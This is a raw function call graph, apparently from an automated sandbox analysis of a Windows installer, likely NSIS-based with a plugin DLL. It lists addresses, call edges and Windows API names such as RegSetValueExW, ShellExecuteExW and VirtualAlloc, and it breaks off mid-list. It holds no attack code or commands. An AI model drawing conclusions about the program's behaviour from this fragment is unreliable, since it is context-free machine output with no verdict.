5385 687e1654 3 API calls 5383->5385 5386 687e17ef 5384->5386 5387 687e17d2 5385->5387 5388 687e1312 2 API calls 5386->5388 5389 687e1312 2 API calls 5387->5389 5390 687e17f5 GlobalFree 5388->5390 5391 687e17d8 GlobalFree 5389->5391 5390->5381 5392 687e1809 GlobalFree 5390->5392 5391->5381 5392->5381 5033 4014cb 5034 4056ca 24 API calls 5033->5034 5035 4014d2 5034->5035 5393 4016cc 5394 402da6 17 API calls 5393->5394 5395 4016d2 GetFullPathNameW 5394->5395 5396 40170e 5395->5396 5397 4016ec 5395->5397 5398 401723 GetShortPathNameW 5396->5398 5399 402c2a 5396->5399 5397->5396 5400 40699e 2 API calls 5397->5400 5398->5399 5401 4016fe 5400->5401 5401->5396 5403 406668 lstrcpynW 5401->5403 5403->5396 5404 401e4e GetDC 5405 402d84 17 API calls 5404->5405 5406 401e60 GetDeviceCaps MulDiv ReleaseDC 5405->5406 5407 402d84 17 API calls 5406->5407 5408 401e91 5407->5408 5409 4066a5 17 API calls 5408->5409 5410 401ece CreateFontIndirectW 5409->5410 5411 402638 5410->5411 5412 402950 5413 402da6 17 API calls 5412->5413 5415 40295c 5413->5415 5414 402972 5417 406133 2 API calls 5414->5417 5415->5414 5416 402da6 17 API calls 5415->5416 5416->5414 5418 402978 5417->5418 5440 406158 GetFileAttributesW CreateFileW 5418->5440 5420 402985 5421 402a3b 5420->5421 5422 4029a0 GlobalAlloc 5420->5422 5423 402a23 5420->5423 5424 402a42 DeleteFileW 5421->5424 5425 402a55 5421->5425 5422->5423 5426 4029b9 5422->5426 5427 403371 44 API calls 5423->5427 5424->5425 5441 4035f8 SetFilePointer 5426->5441 5429 402a30 CloseHandle 5427->5429 5429->5421 5430 4029bf 5431 4035e2 ReadFile 5430->5431 5432 4029c8 GlobalAlloc 5431->5432 5433 4029d8 5432->5433 5434 402a0c 5432->5434 5435 403371 44 API calls 5433->5435 5436 40620a WriteFile 5434->5436 5439 4029e5 5435->5439 5437 402a18 GlobalFree 5436->5437 5437->5423 5438 402a03 GlobalFree 5438->5434 5439->5438 5440->5420 5441->5430 5442 407452 5445 406be3 5442->5445 5443 406c64 GlobalFree 5444 406c6d GlobalAlloc 5443->5444 5444->5445 5446 40754e 5444->5446 5445->5443 5445->5444 5445->5445 5445->5446 5447 406ce4 GlobalAlloc 5445->5447 5448 406cdb GlobalFree 5445->5448 5447->5445 5447->5446 5448->5447 5449 403cd5 5450 403ce0 5449->5450 5451 403ce7 GlobalAlloc 5450->5451 5452 403ce4 5450->5452 5451->5452 5453 401956 5454 402da6 17 API calls 5453->5454 5455 40195d lstrlenW 5454->5455 5456 402638 5455->5456 5122 4014d7 5123 402d84 17 API calls 5122->5123 5124 4014dd Sleep 5123->5124 5126 402c2a 5124->5126 5457 687e23e9 5458 687e2453 5457->5458 5459 687e245e GlobalAlloc 5458->5459 5460 687e247d 5458->5460 5459->5458 5127 4020d8 5128 40219c 5127->5128 5129 4020ea 5127->5129 5131 401423 24 API calls 5128->5131 5130 402da6 17 API calls 5129->5130 5132 4020f1 5130->5132 5138 4022f6 5131->5138 5133 402da6 17 API calls 5132->5133 5134 4020fa 5133->5134 5135 402110 LoadLibraryExW 5134->5135 5136 402102 GetModuleHandleW 5134->5136 5135->5128 5137 402121 5135->5137 5136->5135 5136->5137 5150 406aa4 5137->5150 5141 402132 5143 402151 5141->5143 5144 40213a 5141->5144 5142 40216b 5145 4056ca 24 API calls 5142->5145 5155 687e1817 5143->5155 5146 401423 24 API calls 5144->5146 5147 402142 5145->5147 5146->5147 5147->5138 5148 40218e FreeLibrary 5147->5148 5148->5138 5197 40668a WideCharToMultiByte 5150->5197 5152 406ac1 5153 406ac8 GetProcAddress 5152->5153 5154 40212c 5152->5154 5153->5154 5154->5141 5154->5142 5156 687e184a 5155->5156 5198 687e1bff 5156->5198 5158 687e1851 5159 687e1976 5158->5159 5160 687e1869 5158->5160 5161 687e1862 5158->5161 5159->5147 5232 687e2480 5160->5232 5244 687e243e 5161->5244 5166 687e18af 5257 687e2655 5166->5257 5167 687e18cd 5171 687e191e 5167->5171 5172 687e18d3 5167->5172 5168 687e187f 5176 687e1885 5168->5176 5177 687e1890 5168->5177 5169 687e1898 5181 687e188e 5169->5181 5254 687e2e23 5169->5254 5174 687e2655 9 API calls 5171->5174 5275 687e1666 5172->5275 5182 687e190f 5174->5182 5175 687e18b5 5267 687e1654 5175->5267 5176->5181 5238 687e2b98 5176->5238 5248 687e2810 5177->5248 5181->5166 5181->5167 5188 687e1965 5182->5188 5281 687e2618 5182->5281 5185 687e2655 9 API calls 5185->5182 5187 687e1896 5187->5181 5188->5159 5190 687e196f GlobalFree 5188->5190 5190->5159 5194 687e1951 5194->5188 5285 687e15dd wsprintfW 5194->5285 5195 687e194a FreeLibrary 5195->5194 5197->5152 5288 687e12bb GlobalAlloc 5198->5288 5200 687e1c26 5289 687e12bb GlobalAlloc 5200->5289 5202 687e1e6b GlobalFree GlobalFree GlobalFree 5203 687e1e88 5202->5203 5219 687e1ed2 5202->5219 5205 687e227e 5203->5205 5213 687e1e9d 5203->5213 5203->5219 5204 687e1d26 GlobalAlloc 5222 687e1c31 5204->5222 5206 687e22a0 GetModuleHandleW 5205->5206 5205->5219 5209 687e22c6 5206->5209 5210 687e22b1 LoadLibraryW 5206->5210 5207 687e1d71 lstrcpyW 5212 687e1d7b lstrcpyW 5207->5212 5208 687e1d8f GlobalFree 5208->5222 5296 687e16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5209->5296 5210->5209 5210->5219 5212->5222 5213->5219 5292 687e12cc 5213->5292 5214 687e2318 5218 687e2325 lstrlenW 5214->5218 5214->5219 5215 687e2126 5295 687e12bb GlobalAlloc 5215->5295 5297 687e16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5218->5297 5219->5158 5220 687e22d8 5220->5214 5230 687e2302 GetProcAddress 5220->5230 5222->5202 5222->5204 5222->5207 5222->5208 5222->5212 5222->5215 5222->5219 5223 687e2067 GlobalFree 5222->5223 5224 687e21ae 5222->5224 5225 687e12cc 2 API calls 5222->5225 5226 687e1dcd 5222->5226 5223->5222 5224->5219 5229 687e2216 lstrcpyW 5224->5229 5225->5222 5226->5222 5290 687e162f GlobalSize GlobalAlloc 5226->5290 5227 687e233f 5227->5219 5229->5219 5230->5214 5231 687e212f 5231->5158 5236 687e2498 5232->5236 5233 687e12cc 2 API calls 5233->5236 5235 687e25c1 GlobalFree 5235->5236 5237 687e186f 5235->5237 5236->5233 5236->5235 5299 687e135a 5236->5299 5237->5168 5237->5169 5237->5181 5240 687e2baa 5238->5240 5239 687e2c4f CloseHandle 5243 687e2c6d 5239->5243 5240->5239 5242 687e2d39 5242->5181 5303 687e2b42 5243->5303 5245 687e2453 5244->5245 5246 687e245e GlobalAlloc 5245->5246 5247 687e1868 5245->5247 5246->5245 5247->5160 5252 687e2840 5248->5252 5249 687e28ee 5251 687e28f4 GlobalSize 5249->5251 5253 687e28fe 5249->5253 5250 687e28db GlobalAlloc 5250->5253 5251->5253 5252->5249 5252->5250 5253->5187 5255 687e2e2e 5254->5255 5256 687e2e6e GlobalFree 5255->5256 5307 687e12bb GlobalAlloc 5257->5307 5259 687e270b lstrcpynW 5263 687e265f 5259->5263 5260 687e26d8 MultiByteToWideChar 5260->5263 5261 687e2742 GlobalFree 5261->5263 5262 687e271e wsprintfW 5262->5263 5263->5259 5263->5260 5263->5261 5263->5262 5264 687e2777 GlobalFree 5263->5264 5265 687e1312 2 API calls 5263->5265 5308 687e1381 5263->5308 5264->5175 5265->5263 5312 687e12bb GlobalAlloc 5267->5312 5269 687e1659 5270 687e1666 2 API calls 5269->5270 5271 687e1663 5270->5271 5272 687e1312 5271->5272 5273 687e131b GlobalAlloc lstrcpynW 5272->5273 5274 687e1355 GlobalFree 5272->5274 5273->5274 5274->5182 5276 687e169f lstrcpyW 5275->5276 5277 687e1672 wsprintfW 5275->5277 5280 687e16b8 5276->5280 5277->5280 5280->5185 5282 687e2626 5281->5282 5284 687e1931 5281->5284 5283 687e2642 GlobalFree 5282->5283 5282->5284 5283->5282 5284->5194 5284->5195 5286 687e1312 2 API calls 5285->5286 5287 687e15fe 5286->5287 5287->5188 5288->5200 5289->5222 5291 687e164d 5290->5291 5291->5226 5298 687e12bb GlobalAlloc 5292->5298 5294 687e12db lstrcpynW 5294->5219 5295->5231 5296->5220 5297->5227 5298->5294 5300 687e1361 5299->5300 5301 687e12cc 2 API calls 5300->5301 5302 687e137f 5301->5302 5302->5236 5304 687e2b4d 5303->5304 5305 687e2b5d 5304->5305 5306 687e2b52 GetLastError 5304->5306 5305->5242 5306->5305 5307->5263 5309 687e13ac 5308->5309 5310 687e138a 5308->5310 5309->5263 5310->5309 5311 687e1390 lstrcpyW 5310->5311 5311->5309 5312->5269 5461 402b59 5462 402b60 5461->5462 5463 402bab 5461->5463 5466 402d84 17 API calls 5462->5466 5468 402ba9 5462->5468 5464 406a35 5 API calls 5463->5464 5465 402bb2 5464->5465 5467 402da6 17 API calls 5465->5467 5469 402b6e 5466->5469 5470 402bbb 5467->5470 5471 402d84 17 API calls 5469->5471 5470->5468 5472 402bbf IIDFromString 5470->5472 5474 402b7a 5471->5474 5472->5468 5473 402bce 5472->5473 5473->5468 5479 406668 lstrcpynW 5473->5479 5478 4065af wsprintfW 5474->5478 5476 402beb CoTaskMemFree 5476->5468 5478->5468 5479->5476 5480 402a5b 5481 402d84 17 API calls 5480->5481 5482 402a61 5481->5482 5483 402aa4 5482->5483 5484 402a88 5482->5484 5489 40292e 5482->5489 5486 402abe 5483->5486 5487 402aae 5483->5487 5485 402a8d 5484->5485 5491 402a9e 5484->5491 5494 406668 lstrcpynW 5485->5494 5490 4066a5 17 API calls 5486->5490 5488 402d84 17 API calls 5487->5488 5488->5489 5490->5489 5495 4065af wsprintfW 5491->5495 5494->5489 5495->5489 5327 40175c 5328 402da6 17 API calls 5327->5328 5329 401763 5328->5329 5330 406187 2 API calls 5329->5330 5331 40176a 5330->5331 5332 406187 2 API calls 5331->5332 5332->5331 5496 401d5d 5497 402d84 17 API calls 5496->5497 5498 401d6e SetWindowLongW 5497->5498 5499 402c2a 5498->5499 5333 401ede 5334 402d84 17 API calls 5333->5334 5335 401ee4 5334->5335 5336 402d84 17 API calls 5335->5336 5337 401ef0 5336->5337 5338 401f07 EnableWindow 5337->5338 5339 401efc ShowWindow 5337->5339 5340 402c2a 5338->5340 5339->5340 5500 4028de 5501 4028e6 5500->5501 5502 4028ea FindNextFileW 5501->5502 5504 4028fc 5501->5504 5503 402943 5502->5503 5502->5504 5506 406668 lstrcpynW 5503->5506 5506->5504 5507 406d5f 5511 406be3 5507->5511 5508 40754e 5509 406c64 GlobalFree 5510 406c6d GlobalAlloc 5509->5510 5510->5508 5510->5511 5511->5508 5511->5509 5511->5510 5512 406ce4 GlobalAlloc 5511->5512 5513 406cdb GlobalFree 5511->5513 5512->5508 5512->5511 5513->5512 5514 687e10e1 5524 687e1111 5514->5524 5515 687e12b0 GlobalFree 5516 687e11d7 GlobalAlloc 5516->5524 5517 687e1240 GlobalFree 5517->5524 5518 687e135a 2 API calls 5518->5524 5519 687e12ab 5519->5515 5520 687e1312 2 API calls 5520->5524 5521 687e129a GlobalFree 5521->5524 5522 687e116b GlobalAlloc 5522->5524 5523 687e1381 lstrcpyW 5523->5524 5524->5515 5524->5516 5524->5517 5524->5518 5524->5519 5524->5520 5524->5521 5524->5522 5524->5523 5525 401563 5526 402ba4 5525->5526 5529 4065af wsprintfW 5526->5529 5528 402ba9 5529->5528 5530 687e1058 5532 687e1074 5530->5532 5531 687e10dd 5532->5531 5533 687e1092 5532->5533 5543 687e15b6 5532->5543 5535 687e15b6 GlobalFree 5533->5535 5536 687e10a2 5535->5536 5537 687e10a9 GlobalSize 5536->5537 5538 687e10b2 5536->5538 5537->5538 5539 687e10c7 5538->5539 5540 687e10b6 GlobalAlloc 5538->5540 5542 687e10d2 GlobalFree 5539->5542 5541 687e15dd 3 API calls 5540->5541 5541->5539 5542->5531 5544 687e15bc 5543->5544 5545 687e15c2 5544->5545 5546 687e15ce GlobalFree 5544->5546 5545->5533 5546->5533 5554 401968 5555 402d84 17 API calls 5554->5555 5556 40196f 5555->5556 5557 402d84 17 API calls 5556->5557 5558 40197c 5557->5558 5559 402da6 17 API calls 5558->5559 5560 401993 lstrlenW 5559->5560 5562 4019a4 5560->5562 5561 4019e5 5562->5561 5566 406668 lstrcpynW 5562->5566 5564 4019d5 5564->5561 5565 4019da lstrlenW 5564->5565 5565->5561 5566->5564 5567 40166a 5568 402da6 17 API calls 5567->5568 5569 401670 5568->5569 5570 40699e 2 API calls 5569->5570 5571 401676 5570->5571 5572 402aeb 5573 402d84 17 API calls 5572->5573 5574 402af1 5573->5574 5575 4066a5 17 API calls 5574->5575 5576 40292e 5574->5576 5575->5576 5577 4026ec 5578 402d84 17 API calls 5577->5578 5585 4026fb 5578->5585 5579 402838 5580 402745 ReadFile 5580->5579 5580->5585 5581 4061db ReadFile 5581->5585 5582 402785 MultiByteToWideChar 5582->5585 5583 40283a 5599 4065af wsprintfW 5583->5599 5585->5579 5585->5580 5585->5581 5585->5582 5585->5583 5587 4027ab SetFilePointer MultiByteToWideChar 5585->5587 5589 40284b 5585->5589 5590 406239 SetFilePointer 5585->5590 5587->5585 5588 40286c SetFilePointer 5588->5579 5589->5579 5589->5588 5591 40626d 5590->5591 5592 406255 5590->5592 5591->5585 5593 4061db ReadFile 5592->5593 5594 406261 5593->5594 5594->5591 5595 406276 SetFilePointer 5594->5595 5596 40629e SetFilePointer 5594->5596 5595->5596 5597 406281 5595->5597 5596->5591 5598 40620a WriteFile 5597->5598 5598->5591 5599->5579 5600 404a6e 5601 404aa4 5600->5601 5602 404a7e 5600->5602 5604 40462b 8 API calls 5601->5604 5603 4045c4 18 API calls 5602->5603 5605 404a8b SetDlgItemTextW 5603->5605 5606 404ab0 5604->5606 5605->5601 5036 40176f 5037 402da6 17 API calls 5036->5037 5038 401776 5037->5038 5039 401796 5038->5039 5040 40179e 5038->5040 5075 406668 lstrcpynW 5039->5075 5076 406668 lstrcpynW 5040->5076 5043 4017a9 5045 405f37 3 API calls 5043->5045 5044 40179c 5047 4068ef 5 API calls 5044->5047 5046 4017af lstrcatW 5045->5046 5046->5044 5064 4017bb 5047->5064 5048 40699e 2 API calls 5048->5064 5050 406133 2 API calls 5050->5064 5051 4017cd CompareFileTime 5051->5064 5052 40188d 5054 4056ca 24 API calls 5052->5054 5053 401864 5055 4056ca 24 API calls 5053->5055 5063 401879 5053->5063 5057 401897 5054->5057 5055->5063 5056 406668 lstrcpynW 5056->5064 5058 403371 44 API calls 5057->5058 5059 4018aa 5058->5059 5060 4018be SetFileTime 5059->5060 5062 4018d0 FindCloseChangeNotification 5059->5062 5060->5062 5061 4066a5 17 API calls 5061->5064 5062->5063 5065 4018e1 5062->5065 5064->5048 5064->5050 5064->5051 5064->5052 5064->5053 5064->5056 5064->5061 5072 405cc8 MessageBoxIndirectW 5064->5072 5074 406158 GetFileAttributesW CreateFileW 5064->5074 5066 4018e6 5065->5066 5067 4018f9 5065->5067 5068 4066a5 17 API calls 5066->5068 5069 4066a5 17 API calls 5067->5069 5070 4018ee lstrcatW 5068->5070 5071 401901 5069->5071 5070->5071 5071->5063 5073 405cc8 MessageBoxIndirectW 5071->5073 5072->5064 5073->5063 5074->5064 5075->5044 5076->5043 5607 401a72 5608 402d84 17 API calls 5607->5608 5609 401a7b 5608->5609 5610 402d84 17 API calls 5609->5610 5611 401a20 5610->5611 5612 401573 5613 401583 ShowWindow 5612->5613 5614 40158c 5612->5614 5613->5614 5615 40159a ShowWindow 5614->5615 5616 402c2a 5614->5616 5615->5616 5617 4023f4 5618 402da6 17 API calls 5617->5618 5619 402403 5618->5619 5620 402da6 17 API calls 5619->5620 5621 40240c 5620->5621 5622 402da6 17 API calls 5621->5622 5623 402416 GetPrivateProfileStringW 5622->5623 5624 4014f5 SetForegroundWindow 5625 402c2a 5624->5625 5626 401ff6 5627 402da6 17 API calls 5626->5627 5628 401ffd 5627->5628 5629 40699e 2 API calls 5628->5629 5630 402003 5629->5630 5632 402014 5630->5632 5633 4065af wsprintfW 5630->5633 5633->5632 5634 401b77 5635 402da6 17 API calls 5634->5635 5636 401b7e 5635->5636 5637 402d84 17 API calls 5636->5637 5638 401b87 wsprintfW 5637->5638 5639 402c2a 5638->5639 5640 4046fa lstrcpynW lstrlenW 5313 40167b 5314 402da6 17 API calls 5313->5314 5315 401682 5314->5315 5316 402da6 17 API calls 5315->5316 5317 40168b 5316->5317 5318 402da6 17 API calls 5317->5318 5319 401694 MoveFileW 5318->5319 5320 4016a0 5319->5320 5321 4016a7 5319->5321 5322 401423 24 API calls 5320->5322 5323 40699e 2 API calls 5321->5323 5325 4022f6 5321->5325 5322->5325 5324 4016b6 5323->5324 5324->5325 5326 406428 36 API calls 5324->5326 5326->5320 5641 687e2d43 5642 687e2d5b 5641->5642 5643 687e162f 2 API calls 5642->5643 5644 687e2d76 5643->5644 5652 4022ff 5653 402da6 17 API calls 5652->5653 5654 402305 5653->5654 5655 402da6 17 API calls 5654->5655 5656 40230e 5655->5656 5657 402da6 17 API calls 5656->5657 5658 402317 5657->5658 5659 40699e 2 API calls 5658->5659 5660 402320 5659->5660 5661 402331 lstrlenW lstrlenW 5660->5661 5662 402324 5660->5662 5664 4056ca 24 API calls 5661->5664 5663 4056ca 24 API calls 5662->5663 5666 40232c 5662->5666 5663->5666 5665 40236f SHFileOperationW 5664->5665 5665->5662 5665->5666 5667 4019ff 5668 402da6 17 API calls 5667->5668 5669 401a06 5668->5669 5670 402da6 17 API calls 5669->5670 5671 401a0f 5670->5671 5672 401a16 lstrcmpiW 5671->5672 5673 401a28 lstrcmpW 5671->5673 5674 401a1c 5672->5674 5673->5674 5675 401000 5676 401037 BeginPaint GetClientRect 5675->5676 5677 40100c DefWindowProcW 5675->5677 5678 4010f3 5676->5678 5682 401179 5677->5682 5680 401073 CreateBrushIndirect FillRect DeleteObject 5678->5680 5681 4010fc 5678->5681 5680->5678 5683 401102 CreateFontIndirectW 5681->5683 5684 401167 EndPaint 5681->5684 5683->5684 5685 401112 6 API calls 5683->5685 5684->5682 5685->5684 5686 401d81 5687 401d94 GetDlgItem 5686->5687 5688 401d87 5686->5688 5690 401d8e 5687->5690 5689 402d84 17 API calls 5688->5689 5689->5690 5691 401dd5 GetClientRect LoadImageW SendMessageW 5690->5691 5693 402da6 17 API calls 5690->5693 5694 401e33 5691->5694 5696 401e3f 5691->5696 5693->5691 5695 401e38 DeleteObject 5694->5695 5694->5696 5695->5696 5697 687e103d 5700 687e101b 5697->5700 5701 687e15b6 GlobalFree 5700->5701 5702 687e1020 5701->5702 5703 687e1027 GlobalAlloc 5702->5703 5704 687e1024 5702->5704 5703->5704 5705 687e15dd 3 API calls 5704->5705 5706 687e103b 5705->5706 5707 401503 5708 40150b 5707->5708 5710 40151e 5707->5710 5709 402d84 17 API calls 5708->5709 5709->5710 5711 404783 5715 4048b5 5711->5715 5716 40479b 5711->5716 5712 40491f 5713 4049e9 5712->5713 5714 404929 GetDlgItem 5712->5714 5721 40462b 8 API calls 5713->5721 5718 404943 5714->5718 5719 4049aa 5714->5719 5715->5712 5715->5713 5722 4048f0 GetDlgItem SendMessageW 5715->5722 5717 4045c4 18 API calls 5716->5717 5720 404802 5717->5720 5718->5719 5726 404969 SendMessageW LoadCursorW SetCursor 5718->5726 5719->5713 5727 4049bc 5719->5727 5724 4045c4 18 API calls 5720->5724 5725 4049e4 5721->5725 5744 4045e6 KiUserCallbackDispatcher 5722->5744 5729 40480f CheckDlgButton 5724->5729 5748 404a32 5726->5748 5731 4049d2 5727->5731 5732 4049c2 SendMessageW 5727->5732 5728 40491a 5745 404a0e 5728->5745 5742 4045e6 KiUserCallbackDispatcher 5729->5742 5731->5725 5736 4049d8 SendMessageW 5731->5736 5732->5731 5736->5725 5737 40482d GetDlgItem 5743 4045f9 SendMessageW 5737->5743 5739 404843 SendMessageW 5740 404860 GetSysColor 5739->5740 5741 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5739->5741 5740->5741 5741->5725 5742->5737 5743->5739 5744->5728 5746 404a21 SendMessageW 5745->5746 5747 404a1c 5745->5747 5746->5712 5747->5746 5751 405c8e ShellExecuteExW 5748->5751 5750 404998 LoadCursorW SetCursor 5750->5719 5751->5750 5752 402383 5753 40238a 5752->5753 5756 40239d 5752->5756 5754 4066a5 17 API calls 5753->5754 5755 402397 5754->5755 5755->5756 5757 405cc8 MessageBoxIndirectW 5755->5757 5757->5756 5758 402c05 SendMessageW 5759 402c2a 5758->5759 5760 402c1f InvalidateRect 5758->5760 5760->5759 4915 405809 4916 4059b3 4915->4916 4917 40582a GetDlgItem GetDlgItem GetDlgItem 4915->4917 4919 4059e4 4916->4919 4920 4059bc GetDlgItem CreateThread FindCloseChangeNotification 4916->4920 4961 4045f9 SendMessageW 4917->4961 4922 405a0f 4919->4922 4923 405a34 4919->4923 4924 4059fb ShowWindow ShowWindow 4919->4924 4920->4919 4964 40579d 5 API calls 4920->4964 4921 40589a 4927 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4921->4927 4925 405a1b 4922->4925 4926 405a6f 4922->4926 4931 40462b 8 API calls 4923->4931 4963 4045f9 SendMessageW 4924->4963 4929 405a23 4925->4929 4930 405a49 ShowWindow 4925->4930 4926->4923 4937 405a7d SendMessageW 4926->4937 4935 4058f3 SendMessageW SendMessageW 4927->4935 4936 40590f 4927->4936 4938 40459d SendMessageW 4929->4938 4933 405a69 4930->4933 4934 405a5b 4930->4934 4932 405a42 4931->4932 4940 40459d SendMessageW 4933->4940 4939 4056ca 24 API calls 4934->4939 4935->4936 4941 405922 4936->4941 4942 405914 SendMessageW 4936->4942 4937->4932 4943 405a96 CreatePopupMenu 4937->4943 4938->4923 4939->4933 4940->4926 4945 4045c4 18 API calls 4941->4945 4942->4941 4944 4066a5 17 API calls 4943->4944 4946 405aa6 AppendMenuW 4944->4946 4947 405932 4945->4947 4948 405ac3 GetWindowRect 4946->4948 4949 405ad6 TrackPopupMenu 4946->4949 4950 40593b ShowWindow 4947->4950 4951 40596f GetDlgItem SendMessageW 4947->4951 4948->4949 4949->4932 4953 405af1 4949->4953 4954 405951 ShowWindow 4950->4954 4955 40595e 4950->4955 4951->4932 4952 405996 SendMessageW SendMessageW 4951->4952 4952->4932 4956 405b0d SendMessageW 4953->4956 4954->4955 4962 4045f9 SendMessageW 4955->4962 4956->4956 4957 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4956->4957 4959 405b4f SendMessageW 4957->4959 4959->4959 4960 405b78 GlobalUnlock SetClipboardData CloseClipboard 4959->4960 4960->4932 4961->4921 4962->4951 4963->4922 4982 40248a 4983 402da6 17 API calls 4982->4983 4984 40249c 4983->4984 4985 402da6 17 API calls 4984->4985 4986 4024a6 4985->4986 4999 402e36 4986->4999 4989 402c2a 4990 4024de 4992 4024ea 4990->4992 4994 402d84 17 API calls 4990->4994 4991 402da6 17 API calls 4993 4024d4 lstrlenW 4991->4993 4995 402509 RegSetValueExW 4992->4995 4996 403371 44 API calls 4992->4996 4993->4990 4994->4992 4997 40251f RegCloseKey 4995->4997 4996->4995 4997->4989 5000 402e51 4999->5000 5003 406503 5000->5003 5004 406512 5003->5004 5005 4024b6 5004->5005 5006 40651d RegCreateKeyExW 5004->5006 5005->4989 5005->4990 5005->4991 5006->5005 5023 40290b 5024 402da6 17 API calls 5023->5024 5025 402912 FindFirstFileW 5024->5025 5026 40293a 5025->5026 5029 402925 5025->5029 5027 402943 5026->5027 5031 4065af wsprintfW 5026->5031 5032 406668 lstrcpynW 5027->5032 5031->5027 5032->5029 5761 404e0b 5762 404e37 5761->5762 5763 404e1b 5761->5763 5764 404e6a 5762->5764 5765 404e3d SHGetPathFromIDListW 5762->5765 5772 405cac GetDlgItemTextW 5763->5772 5767 404e4d 5765->5767 5771 404e54 SendMessageW 5765->5771 5769 40140b 2 API calls 5767->5769 5768 404e28 SendMessageW 5768->5762 5769->5771 5771->5764 5772->5768 5773 40190c 5774 401943 5773->5774 5775 402da6 17 API calls 5774->5775 5776 401948 5775->5776 5777 405d74 67 API calls 5776->5777 5778 401951 5777->5778 5779 40190f 5780 402da6 17 API calls 5779->5780 5781 401916 5780->5781 5782 405cc8 MessageBoxIndirectW 5781->5782 5783 40191f 5782->5783 5784 401491 5785 4056ca 24 API calls 5784->5785 5786 401498 5785->5786 5787 402891 5788 402898 5787->5788 5790 402ba9 5787->5790 5789 402d84 17 API calls 5788->5789 5791 40289f 5789->5791 5792 4028ae SetFilePointer 5791->5792 5792->5790 5793 4028be 5792->5793 5795 4065af wsprintfW 5793->5795 5795->5790 5796 401f12 5797 402da6 17 API calls 5796->5797 5798 401f18 5797->5798 5799 402da6 17 API calls 5798->5799 5800 401f21 5799->5800 5801 402da6 17 API calls 5800->5801 5802 401f2a 5801->5802 5803 402da6 17 API calls 5802->5803 5804 401f33 5803->5804 5805 401423 24 API calls 5804->5805 5806 401f3a 5805->5806 5813 405c8e ShellExecuteExW 5806->5813 5808 401f82 5809 406ae0 5 API calls 5808->5809 5810 40292e 5808->5810 5811 401f9f CloseHandle 5809->5811 5811->5810 5813->5808 5814 402f93 5815 402fa5 SetTimer 5814->5815 5816 402fbe 5814->5816 5815->5816 5817 40300c 5816->5817 5818 403012 MulDiv 5816->5818 5819 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 5818->5819 5819->5817 5835 401d17 5836 402d84 17 API calls 5835->5836 5837 401d1d IsWindow 5836->5837 5838 401a20 5837->5838 5839 687e27a4 5840 687e2808 5839->5840 5841 687e27b2 VirtualAlloc 5839->5841 5841->5840 5842 401b9b 5843 401bec 5842->5843 5844 401ba8 5842->5844 5846 401bf1 5843->5846 5847 401c16 GlobalAlloc 5843->5847 5845 401c31 5844->5845 5850 401bbf 5844->5850 5848 4066a5 17 API calls 5845->5848 5855 40239d 5845->5855 5846->5855 5863 406668 lstrcpynW 5846->5863 5849 4066a5 17 API calls 5847->5849 5851 402397 5848->5851 5849->5845 5861 406668 lstrcpynW 5850->5861 5851->5855 5857 405cc8 MessageBoxIndirectW 5851->5857 5854 401c03 GlobalFree 5854->5855 5856 401bce 5862 406668 lstrcpynW 5856->5862 5857->5855 5859 401bdd 5864 406668 lstrcpynW 5859->5864 5861->5856 5862->5859 5863->5854 5864->5855 5865 40261c 5866 402da6 17 API calls 5865->5866 5867 402623 5866->5867 5870 406158 GetFileAttributesW CreateFileW 5867->5870 5869 40262f 5870->5869 5341 40259e 5342 402de6 17 API calls 5341->5342 5343 4025a8 5342->5343 5344 402d84 17 API calls 5343->5344 5345 4025b1 5344->5345 5346 4025d9 RegEnumValueW 5345->5346 5347 4025cd RegEnumKeyW 5345->5347 5350 40292e 5345->5350 5348 4025f5 RegCloseKey 5346->5348 5349 4025ee 5346->5349 5347->5348 5348->5350 5349->5348 5878 40149e 5879 4014ac PostQuitMessage 5878->5879 5880 40239d 5878->5880 5879->5880 4794 4015a3 4795 402da6 17 API calls 4794->4795 4796 4015aa SetFileAttributesW 4795->4796 4797 4015bc 4796->4797 4798 401fa4 4799 402da6 17 API calls 4798->4799 4800 401faa 4799->4800 4801 4056ca 24 API calls 4800->4801 4802 401fb4 4801->4802 4803 405c4b 2 API calls 4802->4803 4804 401fba 4803->4804 4805 401fdd CloseHandle 4804->4805 4808 40292e 4804->4808 4813 406ae0 WaitForSingleObject 4804->4813 4805->4808 4809 401fcf 4810 401fd4 4809->4810 4811 401fdf 4809->4811 4818 4065af wsprintfW 4810->4818 4811->4805 4814 406afa 4813->4814 4815 406b0c GetExitCodeProcess 4814->4815 4816 406a71 2 API calls 4814->4816 4815->4809 4817 406b01 WaitForSingleObject 4816->4817 4817->4814 4818->4805 4965 40252a 4976 402de6 4965->4976 4968 402da6 17 API calls 4969 40253d 4968->4969 4970 402548 RegQueryValueExW 4969->4970 4974 40292e 4969->4974 4971 40256e RegCloseKey 4970->4971 4972 402568 4970->4972 4971->4974 4972->4971 4981 4065af wsprintfW 4972->4981 4977 402da6 17 API calls 4976->4977 4978 402dfd 4977->4978 4979 4064d5 RegOpenKeyExW 4978->4979 4980 402534 4979->4980 4980->4968 4981->4971 5007 4021aa 5008 402da6 17 API calls 5007->5008 5009 4021b1 5008->5009 5010 402da6 17 API calls 5009->5010 5011 4021bb 5010->5011 5012 402da6 17 API calls 5011->5012 5013 4021c5 5012->5013 5014 402da6 17 API calls 5013->5014 5015 4021cf 5014->5015 5016 402da6 17 API calls 5015->5016 5017 4021d9 5016->5017 5018 402218 CoCreateInstance 5017->5018 5019 402da6 17 API calls 5017->5019 5022 402237 5018->5022 5019->5018 5020 401423 24 API calls 5021 4022f6 5020->5021 5022->5020 5022->5021 5881 40202a 5882 402da6 17 API calls 5881->5882 5883 402031 5882->5883 5884 406a35 5 API calls 5883->5884 5885 402040 5884->5885 5886 4020cc 5885->5886 5887 40205c GlobalAlloc 5885->5887 5887->5886 5888 402070 5887->5888 5889 406a35 5 API calls 5888->5889 5890 402077 5889->5890 5891 406a35 5 API calls 5890->5891 5892 402081 5891->5892 5892->5886 5896 4065af wsprintfW 5892->5896 5894 4020ba 5897 4065af wsprintfW 5894->5897 5896->5894 5897->5886 5905 401a30 5906 402da6 17 API calls 5905->5906 5907 401a39 ExpandEnvironmentStringsW 5906->5907 5908 401a4d 5907->5908 5910 401a60 5907->5910 5909 401a52 lstrcmpW 5908->5909 5908->5910 5909->5910 5911 405031 GetDlgItem GetDlgItem 5912 405083 7 API calls 5911->5912 5918 